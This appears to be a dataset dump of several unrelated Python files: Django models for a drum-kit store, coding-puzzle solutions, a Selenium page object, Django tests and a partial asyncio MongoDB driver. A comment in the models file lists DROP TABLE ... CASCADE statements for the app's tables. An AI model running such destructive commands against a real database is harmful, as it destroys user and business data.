__unicode__(self):\n return self.name\n\n\n#-------------------------------------------------------------->\n# VENDOR KIT\n\ndef upload_vendor_logo(instance, filename):\n vendor_name = instance.name.replace(\" \", \"_\").replace(\"'\", \"\")\n return \"media/vendors/\" + vendor_name + \"/logo/\" + filename\n\ndef upload_vendor_kit_image(instance, filename):\n vendor_name = instance.vendor.name.replace(\" \", \"_\").replace(\"'\", \"\")\n kit_name = instance.name.replace(\" \", \"_\").replace(\"'\", \"\")\n return \"media/vendors/\" + vendor_name + \"/kits/\" + kit_name + \"/\" + filename\n\n\nclass Vendor(CommonInfo):\n website = models.URLField(blank=True, null=True)\n# description = models.ForeignKey(KitDescription) # This should be a WYSIWYG field\n# logo = models.ImageField(upload_to=upload_vendor_logo, storage=S3Storage(get_bucket()))\n logo = S3EnabledImageField(upload_to=upload_vendor_logo)\n facebook = models.URLField(blank=True, null=True)\n twitter = models.URLField(blank=True, null=True)\n google_plus = models.URLField(blank=True, null=True)\n soundcloud = models.URLField(blank=True, null=True)\n\n\nclass VendorKit (CommonInfo):\n active = models.BooleanField(default=True)\n on_sale = models.BooleanField(default=False)\n soundcloud = models.CharField(max_length=500)\n # image = models.ImageField(upload_to=upload_vendor_kit_image, storage=S3Storage(get_bucket()))\n image = S3EnabledImageField(upload_to=upload_vendor_kit_image)\n description = HTMLField(blank=True) # This should be a WYSIWYG field\n date_created = models.DateField(auto_now_add=True, blank=True, null=True)\n sample_count = models.IntegerField(blank=True, null=True)\n commission_rate = models.DecimalField(max_digits=10, decimal_places=2)\n vendor = models.ForeignKey(Vendor)\n tags = models.ManyToManyField(Tag)\n price = models.ForeignKey(Price)\n sale = models.ForeignKey(Sale)\n\n\n#-------------------------------------------------------------->\n# SAMPLE\n\ndef upload_sample_preview(instance, filename):\n vendor_name = instance.vendor_kit.vendor.name.replace(\" \", \"_\").replace(\"'\", \"\")\n kit_name = instance.vendor_kit.name.replace(\" \", \"_\").replace(\"'\", \"\")\n return \"media/vendors/\" + vendor_name + \"/kits/\" + kit_name + \"/samples/preview/\" + filename\n\n\ndef upload_sample_wav(instance, filename):\n vendor_name = instance.vendor_kit.vendor.name.replace(\" \", \"_\").replace(\"'\", \"\")\n kit_name = instance.vendor_kit.name.replace(\" \", \"_\").replace(\"'\", \"\")\n return \"media/vendors/\" + vendor_name + \"/kits/\" + kit_name + \"/samples/wav/\" + filename\n\n\nclass Sample(models.Model):\n KICK = 'Kick'\n SNARE = 'Snare'\n CLAP = 'Clap'\n OVERHEAD = 'Overhead'\n PERCUSSION = 'Percussion'\n SOUNDFX = 'Effect'\n LOOP = 'Loop'\n SAMPLE_TYPE_CHOICES = (\n (KICK, 'Kick'),\n (SNARE, 'Snare'),\n (CLAP, 'Clap'),\n (OVERHEAD, 'Overhead'),\n (PERCUSSION, 'Percussion'),\n (SOUNDFX, 'Effect'),\n (LOOP, 'Loop'),\n )\n name = models.CharField(max_length=50)\n type = models.CharField(max_length=20, choices=SAMPLE_TYPE_CHOICES)\n bpm = models.IntegerField(default=0, blank=True, null=True)\n key = models.CharField(max_length=10, blank=True, null=True)\n preview = models.TextField()\n wav = models.TextField()\n vendor_kit = models.ForeignKey(VendorKit, related_name=\"samples\")\n bucket = get_bucket()\n\n @property\n def s3_preview_url(self):\n return Key(self.bucket, self.preview).generate_url(100000)\n\n @property\n def s3_wav_url(self):\n return Key(self.bucket, self.wav).generate_url(100000)\n\n def __unicode__(self):\n return self.name\n\n\n#-------------------------------------------------------------->\n# KIT BUILDER PURCHASE\n\n\n# doc = UploadedFile()\n# with open(filepath, 'rb') as doc_file:\n# doc.document.save(filename, File(doc_file), save=True)\n# doc.save()\n# \"media\", \"kitbuilder_purchases\", \"user_\"+str(user_id)\n\ndef upload_kitbuilder_purchase_zip(instance, filename):\n # kit_name = instance.name.replace(\" \", \"_\").replace(\"'\", \"\")\n user = instance.user\n return \"media/kitbuilder_purchases/user_\" + str(user.id) + \"/\" + filename\n\n\nclass KitBuilderPurchase(models.Model):\n name = models.CharField(max_length=100)\n date_purchased = models.DateField(auto_now_add=True)\n zip_file = S3EnabledFileField(blank=True, null=True, upload_to=upload_kitbuilder_purchase_zip) # Change this to URL FIELD and ADD COMPUTED PROPERTY\n samples = models.ManyToManyField(Sample, blank=True)\n user = models.ForeignKey(UserProfile, related_name='kitbuilder_purchases')\n\n def __unicode__(self):\n return self.name\n\n\n#-------------------------------------------------------------->\n# KIT BUILDER TEMPLATE\n\ndef upload_template_image(instance, filename):\n user_dir = \"user_\"+str(instance.user.id)\n #template_name = instance.name.replace(\" \", \"_\").replace(\"'\", \"\")\n template_id = instance.id\n return \"media/kb_templates/\" + user_dir + \"/\" + str(template_id) + \"/\" + filename\n\n\nclass KitBuilderTemplate(models.Model):\n name = models.CharField(max_length=100)\n last_updated = models.DateField(auto_now=True)\n # times_added = models.IntegerField(default=0)\n description = models.TextField(blank=True)\n featured = models.BooleanField(default=False)\n public = models.BooleanField(default=False)\n # image = models.ImageField(upload_to=upload_template_image, storage=S3Storage(get_bucket()), blank=True, null=True)\n image = S3EnabledImageField(upload_to=upload_template_image, blank=True, null=True)\n user = models.ForeignKey(UserProfile, related_name='kitbuilder_templates')\n samples = models.ManyToManyField(Sample, blank=True)\n tags = models.ManyToManyField(Tag, blank=True)\n users_following = models.ManyToManyField(\n UserProfile,\n blank=True,\n related_name=\"templates_followed\",\n through=\"TemplateFollow\",\n through_fields=('template', 'user')\n )\n\n def __unicode__(self):\n return self.name\n\n\nclass TemplateFollow(models.Model):\n template = models.ForeignKey(KitBuilderTemplate, related_name=\"follows\")\n user = models.ForeignKey(UserProfile, related_name=\"template_follows\")\n date_followed = models.DateField(auto_now_add=True)\n\n def __unicode__(self):\n return self.user.username + \"-follows-\" + self.template.name\n#-------------------------------------------------------------->\n# KIT BUILDER TEMPLATE\n\n######## SIGNALS (for model deletion etc.)\n# Receive the pre_delete signal and delete the file associated with the model instance.\nfrom django.db.models.signals import pre_delete\nfrom django.dispatch.dispatcher import receiver\n\n\n@receiver(pre_delete, sender=Sample)\ndef sample_delete(sender, instance, **kwargs):\n # Pass false so FileField doesn't save the model.\n pass\n # At some point - have to update this signal to delete the file on Amazon automatically\n # instance.preview.delete(False)\n # instance.wav.delete(False)\n\n\n@receiver(pre_delete, sender=VendorKit)\ndef vendor_kit_delete(sender, instance, **kwargs):\n # Pass false so FileField doesn't save the model.\n instance.image.delete(False)\n\n\n@receiver(pre_delete, sender=KitBuilderPurchase)\ndef kitbuilder_purchase_delete(sender, instance, **kwargs):\n # Pass false so FileField doesn't save the model.\n zip_filename = instance.name\n user_id = instance.user.id\n zip_filepath = os.path.join(settings.MEDIA_ROOT, \"kitbuilder_purchases\", \"user_\"+str(user_id), \"%s.zip\" % zip_filename)\n try:\n os.remove(zip_filepath)\n except OSError:\n pass\n\n\n@receiver(pre_delete, sender=KitBuilderTemplate)\ndef kitbuilder_template_delete(sender, instance, **kwargs):\n # Pass false so FileField doesn't save the model.\n instance.image.delete(False)\n\n\n\n# DROP TABLE \"kitbuilder_v1_kitbuildertemplate\" CASCADE;\n# DROP TABLE \"kitbuilder_v1_kitbuildertemplate_samples\" CASCADE;\n# DROP TABLE \"kitbuilder_v1_kitbuildertemplate_tags\" CASCADE;\n# DROP TABLE \"kitbuilder_v1_kitbuilderpurchase\" CASCADE;\n# DROP TABLE \"kitbuilder_v1_kitbuilderpurchase_samples\" CASCADE;\n# DROP TABLE \"kitbuilder_v1_sample\" CASCADE;\n# DROP TABLE \"kitbuilder_v1_vendorkit\" CASCADE;\n# DROP TABLE \"kitbuilder_v1_vendorkit_tags\" CASCADE;\n# DROP TABLE \"kitbuilder_v1_vendor\" CASCADE;\n# DROP TABLE \"kitbuilder_v1_tag\" CASCADE;\n# DROP TABLE \"kitbuilder_v1_sale\" CASCADE;\n# DROP TABLE \"kitbuilder_v1_price\" CASCADE;\n# DROP TABLE \"kitbuilder_v1_follower\" CASCADE;\n# DROP TABLE \"kitbuilder_v1_templatefollow\" CASCADE;\n\n","sub_path":"kitbuilder/kitbuilder_v1/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":10419,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"104230880","text":"# Definition for singly-linked list.\n# class ListNode:\n# def __init__(self, x):\n# self.val = x\n# self.next = None\n\nclass Solution:\n def reorderList(self, head):\n \"\"\"\n :type head: ListNode\n :rtype: void Do not return anything, modify head in-place instead.\n \"\"\"\n if not head:\n return None\n \n slow, fast = head, head.next\n \n #find mid\n while fast and fast.next:\n slow = slow.next\n fast = fast.next.next\n \n prev = None\n it = slow.next\n slow.next = None\n #reverse 2nd half\n while it:\n next_it = it.next\n it.next = prev\n \n prev = it\n it = next_it\n \n right = prev\n left = head\n \n while left and right:\n next_left = left.next\n left.next = right\n \n next_right = right.next\n right.next = next_left\n \n left = next_left\n right = next_right\n \n \n ","sub_path":"143/143.py","file_name":"143.py","file_ext":"py","file_size_in_byte":1125,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"373692214","text":"#-*- coding: UTF-8 -*-\nimport time\nimport os\nfrom framework.base_page import BasePage\nfrom selenium.webdriver.common.by import By\nfrom framework import getcwd\n\nclass CJPage(BasePage):\n # 选择模块按钮\n menu = 'xpath=>//a[@href=\"/ApprSynthesis/appr/synthesis/deliver/toDeliverList.do\"]'\n frame1= 'xpath=>//iframe[@src=\"/ApprSynthesis/appr/synthesis/deliver/toDeliverList.do\"]'\n waite_code = (By.XPATH,'//input[@id=\"controlSeq\"]')\n query_code = 'xpath=>//input[@id=\"controlSeq\"]'\n query_button = 'xpath=>//input[@value=\"查 询\"]'\n qianfa = 'xpath=>//font[contains(text(),\"签收发证\")]'\n\n def open_qianfa(self,code): # 打开页面并点击签收发证\n self.execute_js(self.menu)\n time.sleep(2)\n self.select_frame(self.find_element(self.frame1))\n #self.wait_element(self.waite_code)\n self.type(self.query_code,code)\n self.click(self.query_button)\n time.sleep(2)\n self.click(self.qianfa)\n time.sleep(3)\n\n save_button = 'id=>doSave'\n qianshou = 'id=>doCertReceive'\n frame2 =(By.NAME,\"editTransferWin\")\n select_qs = 'xpath=>//a[contains(text(),\"选择移交人\")]'\n frame3 = (By.NAME,\"userSelect\")\n ceshi2 = 'xpath=>//div[contains(text(),\"测试2\")]'\n queding = 'id=>selectedButton'\n submit = 'id=>sumbitButton'\n\n def qs(self): # 出件窗签收\n self.select_windows()\n self.click(self.save_button)\n time.sleep(3)\n self.click(self.qianshou)\n time.sleep(2)\n self.wait_goframe(self.frame2)\n self.click(self.select_qs)\n time.sleep(2)\n self.wait_goframe(self.frame3)\n self.click(self.ceshi2)\n self.click(self.queding)\n time.sleep(1)\n self.wait_goframe(self.frame2)\n self.click(self.submit)\n self.top_windows()\n time.sleep(3)\n\n def get_message1(self):\n message = self.get_element_text(self.fazheng)\n return message\n\n fazheng = 'id=>sendCertificate'\n frame4 = (By.NAME,'sendCertificate')\n fafang = 'id=>sign'\n jiesu = 'id=>doSend'\n sure = 'xpath=>//button[contains(text(),\"确定\")]'\n\n def fz(self): # 发证\n self.click(self.fazheng)\n time.sleep(2)\n self.wait_goframe(self.frame4)\n self.click(self.fafang)\n time.sleep(3)\n\n def get_message2(self):\n message = self.get_element_text(self.jiesu)\n return message\n\n def end(self): # 结束\n self.click(self.jiesu)\n time.sleep(1)\n self.click(self.sure)\n time.sleep(3)\n\n def get_allwindows(self): # 获取全部窗口进行校验是否正常结束流程并关闭窗口\n handles = self.driver.window_handles\n return handles\n\n","sub_path":"General_Approval/pageobjects/ApprSynthesis/综合窗口出件/CJ_page.py","file_name":"CJ_page.py","file_ext":"py","file_size_in_byte":2743,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"479541427","text":"import copy\nimport sys\nN = int(input())\nH = list(map(int,input().split()))\nC = 0\n\nif sorted(H) == H:\n\tprint(\"YES\")\n\tsys.exit()\n\nfor i in range(0,N-1):\n\tfor j in range(1,N):\n\t\tL = copy.copy(H)\n\t\tL[i],L[j] = L[j],L[i] \n\t\tif L == sorted(H):\n\t\t\tprint(\"YES\")\n\t\t\tsys.exit()\nprint(\"NO\")\n","sub_path":"abc135/b.py","file_name":"b.py","file_ext":"py","file_size_in_byte":280,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"440500826","text":"from django.test import TestCase\n# from django.core.urlresolvers import resolve\nfrom .models import Item\nfrom django.contrib.auth.models import User\n\n\nclass start():\n def create_user(self):\n self.user_in = User.objects.create_user(\n 'khophi',\n 'email@email.com',\n 'password'\n )\n # create user khophi\n self.user_in.save()\n\n def create_item(self):\n self.username = User.objects.get(username='khophi')\n self.item = Item(\n device='Google Nexus 6',\n slug='0000000000',\n type_of_item='md',\n description='An awesome phone I bought from Google',\n stolen='s',\n created_by=self.username\n )\n self.item.save()\n\n\n# Check save and retrieve from DB\nclass SaveToDBDirect(TestCase):\n def setUp(self):\n begin = start()\n begin.create_user()\n begin.create_item()\n\n def test_check_user_account(self):\n self.user = User.objects.all()[0]\n\n self.assertEqual(str(self.user), '[]')\n\n def test_check_new_item(self):\n from_db = Item.objects.count()\n\n self.assertEqual(from_db, 1)\n\n\n# Check request, save and retrieve from DB works via views\n# Non REST\n\nclass TestView(TestCase):\n\n def test_check_login(self):\n request = self.client.post('/admin/', {'username': 'khophi', 'password': 'password'})\n self.assertEqual(request.status_code, 200)\n\n def test_check_details(self):\n request = self.client.get('/detail/0000000000')\n self.assertEqual(request.status_code, 200)\n\n# Check request, save and retrieve from DB works via views\n# REST way\n\n# Check post and get works via browser\n# Mr. Selenium comes in\n\n# Searched empty, response \"Not searched for anything\"\n\n# if not stolen, don't show in results\n\n# Mylist count\n\n# Account login, logout\n\n# get_absolute_urls on models\n","sub_path":"main/tests.py","file_name":"tests.py","file_ext":"py","file_size_in_byte":1923,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"519742320","text":"#!/usr/bin/env python3\n# -*- coding:utf-8 -*-\n## author : cypro666\n## date : 2015.07.16\nimport struct\nimport asyncio\nfrom collections import defaultdict\nimport bson\nfrom bson import SON, ObjectId, Code\nfrom pymongo import errors, auth\n\"\"\"\nasynchronous driver for mongodb\n\"\"\"\n__all__ = ['Database', 'Collection', 'Connection', 'Pool']\n\n\n_ONE = b\"\\x01\\x00\\x00\\x00\"\n_ZERO = b\"\\x00\\x00\\x00\\x00\"\n\n\nclass _Query(object):\n __slots__ = ('id', 'limit', 'collection', 'documents', 'future')\n def __init__(self, id_, collection, limit):\n \"\"\" init won't check the limit arg validate or not \"\"\"\n self.id = id_\n self.limit = limit\n self.collection = collection\n self.documents = []\n self.future = asyncio.Future()\n\n\nclass _Protocol(asyncio.Protocol):\n __slots__ = ('__id', '__buffer', '__queries', '__datalen', '__response', \n '__waiting_header', '_pipelined_calls', 'transport', '_is_connected')\n def __init__(self):\n self.__id = 0\n self.__buffer = b\"\"\n self.__queries = {}\n self.__datalen = None\n self.__response = 0\n self.__waiting_header = True\n self._pipelined_calls = set() # Set of all the pipelined calls.\n self.transport = None\n self._is_connected = False\n\n def connection_made(self, transport):\n self.transport = transport\n self._is_connected = True\n\n def connection_lost(self, exc):\n self._is_connected = False\n self.transport = None\n\n # Raise exception on all waiting futures.\n for f in self.__queries:\n f.set_exception(errors.ConnectionFailure(exc))\n\n @property\n def is_connected(self):\n \"\"\" True when the underlying transport is connected. \"\"\"\n return self._is_connected\n\n def data_received(self, data):\n while self.__waiting_header:\n self.__buffer += data\n if len(self.__buffer) < 16:\n break\n\n # got full header, 16 bytes (or more)\n header, extra = self.__buffer[:16], self.__buffer[16:]\n self.__buffer = b\"\"\n self.__waiting_header = False\n datalen, request, response, operation = struct.unpack(\"= 0, \"Unexpected number of documents received!\"\n if not next_batch:\n self.OP_KILL_CURSORS([cursor_id])\n query.future.set_result(query.documents)\n return\n self.__queries[self.__id] = query\n self.OP_GET_MORE(query.collection, next_batch, cursor_id)\n else:\n query.future.set_result(query.documents)\n\n\ndef _DIRECTION(keys, direction):\n if isinstance(keys, str):\n return (keys, direction),\n elif isinstance(keys, (list, tuple)):\n return tuple([(k, direction) for k in keys])\n\ndef ASCENDING(keys):\n \"\"\"Ascending sort order\"\"\"\n return _DIRECTION(keys, 1)\n\n\ndef DESCENDING(keys):\n \"\"\"Descending sort order\"\"\"\n return _DIRECTION(keys, -1)\n\n\ndef GEO2D(keys):\n \"\"\"\n Two-dimensional geospatial index\n \"\"\"\n return _DIRECTION(keys, \"2d\")\n\n\ndef GEOHAYSTACK(keys):\n \"\"\"\n Bucket-based geospatial index\n \"\"\"\n return _DIRECTION(keys, \"geoHaystack\")\n\n\nclass _QueryFilter(defaultdict):\n def __init__(self):\n defaultdict.__init__(self, lambda:())\n\n def __add__(self, obj):\n for k, v in obj.items():\n if isinstance(v, tuple):\n self[k] += v\n else:\n self[k] = v\n return self\n\n def _index_document(self, operation, index_list):\n name = self.__class__.__name__\n try:\n assert isinstance(index_list, (list, tuple))\n for key, direction in index_list:\n if not isinstance(key, str):\n raise TypeError(\"Invalid %sing key: %s\" % (name, repr(key)))\n if direction not in (1, -1, \"2d\", \"geoHaystack\"):\n raise TypeError(\"Invalid %sing direction: %s\" % (name, direction))\n self[operation] += tuple(((key, direction),))\n except Exception:\n raise TypeError(\"Invalid list of keys for %s: %s\" % (name, repr(index_list)))\n\n def __repr__(self):\n return \"\" % dict.__repr__(self)\n\n\nclass _Sort(_QueryFilter):\n \"\"\"Sorts the results of a query.\"\"\"\n\n def __init__(self, key_list):\n _QueryFilter.__init__(self)\n try:\n assert isinstance(key_list[0], (list, tuple))\n except:\n key_list = (key_list,)\n self._index_document(\"orderby\", key_list)\n\n\nclass _Hint(_QueryFilter):\n \"\"\"Adds a `hint`, telling Mongo the proper index to use for the query.\"\"\"\n\n def __init__(self, index_list):\n _QueryFilter.__init__(self)\n try:\n assert isinstance(index_list[0], (list, tuple))\n except:\n index_list = (index_list,)\n self._index_document(\"$hint\", index_list)\n\n\nclass _Explain(_QueryFilter):\n \"\"\"Returns an explain plan for the query.\"\"\"\n\n def __init__(self):\n _QueryFilter.__init__(self)\n self[\"explain\"] = True\n\n\nclass _Snapshot(_QueryFilter):\n def __init__(self):\n _QueryFilter.__init__(self)\n self[\"snapshot\"] = True\n\n\n\nclass Collection(object):\n \"\"\" Wrapper of all operations on mongo collections \"\"\"\n def __init__(self, database, name):\n if not isinstance(name, str):\n raise TypeError(\"name must be an instance of str\")\n if not name or \"..\" in name:\n raise errors.InvalidName(\"collection names cannot be empty\")\n if \"$\" in name and not (name.startswith(\"oplog.$main\") or\n name.startswith(\"$cmd\")):\n raise errors.InvalidName(\"collection names must not contain '$': %r\" % name)\n if name[0] == \".\" or name[-1] == \".\":\n raise errors.InvalidName(\"collection names must not start or end with '.': %r\" % name)\n if \"\\x00\" in name:\n raise errors.InvalidName(\"collection names must not contain the null character\")\n\n self._database = database\n self._collection_name = name\n\n def __str__(self):\n return \"%s.%s\" % (str(self._database), self._collection_name)\n\n def __repr__(self):\n return \"\" % str(self)\n\n def __getitem__(self, collection_name):\n return Collection(self._database, \"%s.%s\" % (self._collection_name, collection_name))\n\n def __eq__(self, other):\n if isinstance(other, Collection):\n return (self._database, self._collection_name) == (other._database, other._collection_name)\n return NotImplemented\n\n def __hash__(self):\n return self._collection_name.__hash__()\n\n def __getattr__(self, collection_name):\n return self[collection_name]\n\n def __call__(self, collection_name):\n return self[collection_name]\n\n def _fields_list_to_dict(self, fields):\n \"\"\"\n transform a list of fields from [\"a\", \"b\"] to {\"a\":1, \"b\":1}\n \"\"\"\n as_dict = {}\n for field in fields:\n if not isinstance(field, str):\n raise TypeError(\"fields must be a list of key names\")\n as_dict[field] = 1\n return as_dict\n\n def _gen_index_name(self, keys):\n return u\"_\".join([u\"%s_%s\" % item for item in keys])\n\n @asyncio.coroutine\n def options(self):\n result = yield from self._database.system.namespaces.find_one({\"name\": str(self)})\n if result:\n options = result.get(\"options\", {})\n if \"create\" in options:\n del options[\"create\"]\n return options\n return {}\n\n @asyncio.coroutine\n def find(self, spec=None, skip=0, limit=0, fields=None, filter=None, _proto=None):\n if spec is None:\n spec = SON()\n\n if not isinstance(spec, dict):\n raise TypeError(\"spec must be an instance of dict\")\n if fields is not None and not isinstance(fields, (dict, list)):\n raise TypeError(\"fields must be an instance of dict or list\")\n if not isinstance(skip, int):\n raise TypeError(\"skip must be an instance of int\")\n if not isinstance(limit, int):\n raise TypeError(\"limit must be an instance of int\")\n\n if fields is not None:\n if not isinstance(fields, dict):\n if not fields:\n fields = [\"_id\"]\n fields = self._fields_list_to_dict(fields)\n\n if isinstance(filter, (_Sort, _Hint, _Explain, _Snapshot)):\n spec = SON(dict(query=spec))\n for k, v in filter.items():\n spec[k] = isinstance(v, tuple) and SON(v) or v\n\n # send the command through a specific connection\n # this is required for the connection pool to work\n # when safe=True\n if _proto is None:\n proto = self._database._protocol\n else:\n proto = _proto\n return (yield from proto.OP_QUERY(str(self), spec, skip, limit, fields))\n\n @asyncio.coroutine\n def find_one(self, spec=None, fields=None, _proto=None):\n if isinstance(spec, ObjectId):\n spec = SON(dict(_id=spec))\n\n docs = yield from self.find(spec, limit=-1, fields=fields, _proto=_proto)\n doc = docs and docs[0] or {}\n if doc.get(\"err\") is not None:\n if doc.get(\"code\") == 11000:\n raise errors.DuplicateKeyError\n else:\n raise errors.OperationFailure(doc)\n else:\n return doc\n\n @asyncio.coroutine\n def count(self, spec=None, fields=None):\n if fields is not None:\n if not fields:\n fields = [\"_id\"]\n fields = self._fields_list_to_dict(fields)\n spec = SON([(\"count\", self._collection_name),\n (\"query\", spec or SON()),\n (\"fields\", fields)])\n result = yield from self._database[\"$cmd\"].find_one(spec)\n return result[\"n\"]\n\n @asyncio.coroutine\n def group(self, keys, initial, reduce, condition=None, finalize=None):\n body = {\n \"ns\": self._collection_name,\n \"key\": self._fields_list_to_dict(keys),\n \"initial\": initial,\n \"$reduce\": Code(reduce),\n }\n if condition:\n body[\"cond\"] = condition\n if finalize:\n body[\"finalize\"] = Code(finalize)\n\n return (yield from self._database[\"$cmd\"].find_one({\"group\": body}))\n\n @asyncio.coroutine\n def filemd5(self, spec):\n if not isinstance(spec, ObjectId):\n raise ValueError(_(\"filemd5 expected an objectid for its \"\n \"on-keyword argument\"))\n\n spec = SON([(\"filemd5\", spec),\n (\"root\", self._collection_name)])\n\n result = yield from self._database['$cmd'].find_one(spec)\n return result.get('md5')\n\n @asyncio.coroutine\n def __safe_operation(self, proto, safe=False, ids=None):\n callit = False\n result = None\n if safe is True:\n result = yield from self._database[\"$cmd\"].find_one({\"getlasterror\": 1}, _proto=proto)\n else:\n callit = True\n if ids is not None:\n return ids\n if callit is True:\n return None\n return result\n\n @asyncio.coroutine\n def insert(self, docs, safe=False):\n if isinstance(docs, dict):\n ids = docs.get('_id', ObjectId())\n docs[\"_id\"] = ids\n docs = [docs]\n elif isinstance(docs, list):\n ids = []\n for doc in docs:\n if isinstance(doc, dict):\n id = doc.get('_id', ObjectId())\n ids.append(id)\n doc[\"_id\"] = id\n else:\n raise TypeError(\"insert takes a document or a list of documents\")\n else:\n raise TypeError(\"insert takes a document or a list of documents\")\n proto = self._database._protocol\n proto.OP_INSERT(str(self), docs)\n result = yield from self.__safe_operation(proto, safe, ids)\n return result\n\n @asyncio.coroutine\n def update(self, spec, document, upsert=False, multi=False, safe=False):\n if not isinstance(spec, dict):\n raise TypeError(\"spec must be an instance of dict\")\n if not isinstance(document, dict):\n raise TypeError(\"document must be an instance of dict\")\n if not isinstance(upsert, bool):\n raise TypeError(\"upsert must be an instance of bool\")\n proto = self._database._protocol\n proto.OP_UPDATE(str(self), spec, document, upsert, multi)\n return (yield from self.__safe_operation(proto, safe))\n\n @asyncio.coroutine\n def save(self, doc, safe=False):\n if not isinstance(doc, dict):\n raise TypeError(\"cannot save objects of type %s\" % type(doc))\n\n objid = doc.get(\"_id\")\n if objid:\n return (yield from self.update({\"_id\": objid}, doc, safe=safe, upsert=True))\n else:\n return (yield from self.insert(doc, safe=safe))\n\n @asyncio.coroutine\n def remove(self, spec, safe=False):\n if isinstance(spec, ObjectId):\n spec = SON(dict(_id=spec))\n if not isinstance(spec, dict):\n raise TypeError(\"spec must be an instance of dict, not %s\" % type(spec))\n\n proto = self._database._protocol\n proto.OP_DELETE(str(self), spec)\n return (yield from self.__safe_operation(proto, safe))\n\n @asyncio.coroutine\n def drop(self, safe=False):\n return (yield from self.remove({}, safe))\n\n @asyncio.coroutine\n def create_index(self, sort_fields, **kwargs):\n if not isinstance(sort_fields, _Sort):\n raise TypeError(\"sort_fields must be an instance of filter.sort\")\n if \"name\" not in kwargs:\n name = self._gen_index_name(sort_fields[\"orderby\"])\n else:\n name = kwargs.pop(\"name\")\n\n key = SON()\n for k,v in sort_fields[\"orderby\"]:\n key.update({k:v})\n\n index = SON(dict( ns=str(self), name=name, key=key))\n\n if \"drop_dups\" in kwargs:\n kwargs[\"dropDups\"] = kwargs.pop(\"drop_dups\")\n\n if \"bucket_size\" in kwargs:\n kwargs[\"bucketSize\"] = kwargs.pop(\"bucket_size\")\n \n index.update(kwargs)\n yield from self._database.system.indexes.insert(index, safe=True)\n return name\n\n @asyncio.coroutine\n def ensure_index(self, sort_fields, **kwargs):\n # ensure_index is an alias of create_index since we are not \n # keep an index cache same way pymongo does\n return (yield from self.create_index(sort_fields, **kwargs))\n\n @asyncio.coroutine\n def drop_index(self, index_identifier):\n if isinstance(index_identifier, str):\n name = index_identifier\n elif isinstance(index_identifier, _Sort):\n name = self._gen_index_name(index_identifier[\"orderby\"])\n else:\n raise TypeError(\"index_identifier must be a name or instance of filter.sort\")\n\n cmd = SON([(\"deleteIndexes\", self._collection_name), (\"index\", name)])\n return (yield from self._database[\"$cmd\"].find_one(cmd))\n\n @asyncio.coroutine\n def drop_indexes(self):\n return (yield from self.drop_index(\"*\"))\n\n @asyncio.coroutine\n def index_information(self):\n raw = yield from self._database.system.indexes.find({\"ns\": str(self)})\n info = {}\n for idx in raw:\n info[idx[\"name\"]] = idx[\"key\"].items()\n return info\n\n @asyncio.coroutine\n def rename(self, new_name):\n cmd = SON([(\"renameCollection\", str(self)), (\"to\", \"%s.%s\" % \\\n (str(self._database), new_name))])\n return (yield from self._database(\"admin\")[\"$cmd\"].find_one(cmd))\n\n @asyncio.coroutine\n def distinct(self, key, spec=None):\n cmd = SON([(\"distinct\", self._collection_name), (\"key\", key)])\n if spec:\n cmd[\"query\"] = spec\n\n result = yield from self._database[\"$cmd\"].find_one(cmd)\n if result:\n return result.get(\"values\")\n return {}\n\n @asyncio.coroutine\n def aggregate(self, pipeline, full_response=False):\n \"\"\" not stable yet \"\"\"\n cmd = SON([(\"aggregate\", self._collection_name),\n (\"pipeline\", pipeline)])\n\n result = yield from self._database[\"$cmd\"].find_one(cmd)\n if full_response:\n return result\n return result.get(\"result\")\n\n @asyncio.coroutine\n def map_reduce(self, map, reduce, full_response=False, **kwargs):\n \"\"\" not stable yet \"\"\"\n cmd = SON([(\"mapreduce\", self._collection_name), (\"map\", map), (\"reduce\", reduce)])\n cmd.update(**kwargs)\n result = yield from self._database[\"$cmd\"].find_one(cmd)\n if full_response:\n return result\n return result.get(\"result\")\n\n @asyncio.coroutine\n def find_and_modify(self, query=None, update=None, upsert=False, **kwargs):\n if not update and not kwargs.get('remove', None):\n raise ValueError(\"Must either update or remove\")\n if update and kwargs.get('remove', None):\n raise ValueError(\"Can't do both update and remove\")\n\n cmd = SON([(\"findAndModify\", self._collection_name)])\n cmd.update(kwargs)\n # No need to include empty args\n if query:\n cmd['query'] = query\n if update:\n cmd['update'] = update\n if upsert:\n cmd['upsert'] = upsert\n\n result = yield from self._database[\"$cmd\"].find_one(cmd)\n no_obj_error = \"No matching object found\"\n if not result['ok']:\n if result[\"errmsg\"] == no_obj_error:\n return None\n else:\n raise ValueError(\"Unexpected Error: %s\" % (result,))\n return result.get('value')\n\n\nclass Database(object):\n def __init__(self, protocol, database_name):\n self.__protocol = protocol\n self._database_name = database_name\n\n def __str__(self):\n return self._database_name\n\n def __repr__(self):\n return \"\" % self._database_name\n\n def __call__(self, database_name):\n return Database(self.__protocol, database_name)\n\n def __getitem__(self, collection_name):\n return Collection(self, collection_name)\n\n def __getattr__(self, collection_name):\n return self[collection_name]\n\n @property\n def _protocol(self):\n return self.__protocol\n\n @asyncio.coroutine\n def create_collection(self, name, options=None):\n collection = Collection(self, name)\n\n if options:\n if \"size\" in options:\n options[\"size\"] = float(options[\"size\"])\n command = SON({\"create\": name})\n command.update(options)\n result = yield from self[\"$cmd\"].find_one(command)\n if result.get(\"ok\", 0.0):\n return collection\n else:\n raise RuntimeError(result.get(\"errmsg\", \"unknown error\"))\n else:\n return collection\n\n @asyncio.coroutine\n def drop_collection(self, name_or_collection):\n if isinstance(name_or_collection, Collection):\n name = name_or_collection._collection_name\n elif isinstance(name_or_collection, str):\n name = name_or_collection\n else:\n raise TypeError(\"name must be an instance of basestring or txmongo.Collection\")\n\n return self[\"$cmd\"].find_one({\"drop\": name})\n\n @asyncio.coroutine\n def collection_names(self):\n results = yield from self[\"system.namespaces\"].find()\n names = [r[\"name\"] for r in results]\n names = [n[len(str(self)) + 1:] for n in names\n if n.startswith(str(self) + \".\")]\n names = [n for n in names if \"$\" not in n]\n return names\n\n @asyncio.coroutine\n def authenticate(self, name, password):\n \"\"\"\n Send an authentication command for this database.\n mostly stolen from asyncio_mongo._pymongo\n \"\"\"\n if not isinstance(name, str):\n raise TypeError(\"name must be an instance of str\")\n if not 